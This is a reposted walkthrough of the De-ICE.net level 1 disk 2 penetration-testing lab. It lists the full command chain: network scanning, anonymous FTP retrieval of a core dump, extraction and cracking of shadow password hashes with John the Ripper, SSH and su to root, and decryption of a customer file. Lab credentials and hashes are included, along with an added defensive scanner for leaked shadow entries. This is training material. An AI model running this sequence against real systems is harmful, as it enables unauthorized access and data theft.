Monday, September 12, 2011

HOWTO : De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work, not mine. I re-post it here for educational purposes only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post is here

Links

Watch video on-line
Download video

What is this?

This is my walkthrough of how I broke into the De-ICE.net network, level 1, disk 2.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What do I need?

BackTrack 4 (Final)
de-ice.net-1.110-1.0.iso (MD5: a626d884148c63bfc9df36f2743d7242)
Dictionary(s)

Software
Name: De-ICE.net
Version: 1.1 (Level 1 - Disk 2 - IP Address: 1.110)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/

Download Link:

http://www.mediafire.com/?tnci5ewmcoyrp8o
http://de-ice.hackerdemia.com/lib/exe/fetch.php?id=start&cache=cache&media=wiki:de-ice_netcat-1.0.iso
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.110-1.0.iso

Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&t=13
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.1.1-255

nmap -n -sS -sV -O 192.168.1.110

firefox 192.168.1.110

[+]kate -> make list of possible usernames

// lastF, fLast

ftp 192.168.1.110

// Username: anonymous. Password: [Blank]

ls -a

cd download

ls -a

cd etc

ls -a

get core

exit

strings core

[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is on its own line -> Save. Filename: shadow

cd tools/dictionary/

cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords

john

./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccoffee:Diatomaceous

ssh ccoffee@192.168.1.110
//Password: Diatomaceous

ls -a

cd ..

ls -a

cd root/

ls -a

cd .save/

su
//Password: Complexity

cd .save/

ls -a

cat copy.sh

openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw

ls -a

cat customer_account.csv
// GAME OVER

----------------------------------------------------------------------------------------------------
Users
root:Complexity = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams: = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:Zymurgy = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------
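
The exposure behind the `strings core` step is a core dump holding shadow entries in a directory that anonymous FTP can read. The following is an added example, not part of the original walkthrough: a small check a defender could run over files in exported directories to flag leaked shadow(5) lines, their crypt scheme and password-age settings, without echoing the hashes. The function name, field names and the sample blob are constructed for illustration.

```python
import re
from datetime import date, timedelta

# crypt(3) scheme id -> (name, weak by current standards)
SCHEMES = {
    "1": ("md5crypt", True),      # the $1$ scheme seen in the Users list above
    "2a": ("bcrypt", False), "2y": ("bcrypt", False),
    "5": ("sha256crypt", False), "6": ("sha512crypt", False),
    "y": ("yescrypt", False),
}

# shadow(5): name:$id$salt$hash:lastchg:min:max:...  (locked "!"/"*" entries are skipped)
SHADOW_RE = re.compile(
    rb"(?<![A-Za-z0-9_-])([a-z_][a-z0-9_-]{0,31}):\$([0-9a-z]{1,2})\$"
    rb"[./0-9A-Za-z$]+:(\d*):(\d*):(\d*):"
)

def find_shadow_leaks(blob: bytes) -> list:
    """Return one finding per shadow-style entry embedded in arbitrary bytes."""
    findings = []
    for m in SHADOW_RE.finditer(blob):
        user, scheme_id, lastchg, _min_age, max_age = (g.decode() for g in m.groups())
        name, weak = SCHEMES.get(scheme_id, ("unknown", True))
        changed = None
        if lastchg:  # field is days since 1970-01-01
            changed = (date(1970, 1, 1) + timedelta(days=int(lastchg))).isoformat()
        findings.append({
            "offset": m.start(),          # where in the file the entry sits
            "user": user,
            "scheme": name,
            "weak_scheme": weak,
            "last_changed": changed,
            "no_max_age": max_age == "",  # empty field: password never expires
        })
    return findings

# Constructed sample: binary noise around fake entries (not real hashes).
SAMPLE_CORE = (
    b"\x7fELF\x01\x01\x00\x00CORE\x00\x00"
    b"root:$1$CONSTRCT$" + b"A" * 22 + b":13574:0:::::\n"
    b"svc:$6$CONSTRUCTEDSALT$" + b"B" * 86 + b":19000:0:90:7:::\n"
    b"locked:!:13570:0:99999:7:::\n\x00\xff\xfe"
)

if __name__ == "__main__":
    for finding in find_shadow_leaks(SAMPLE_CORE):
        print(finding)
```

Any finding in a directory served to anonymous users means the affected passwords should be rotated and the file removed; disabling core dumps for privileged daemons prevents the file from appearing in the first place.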


Notes

Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you!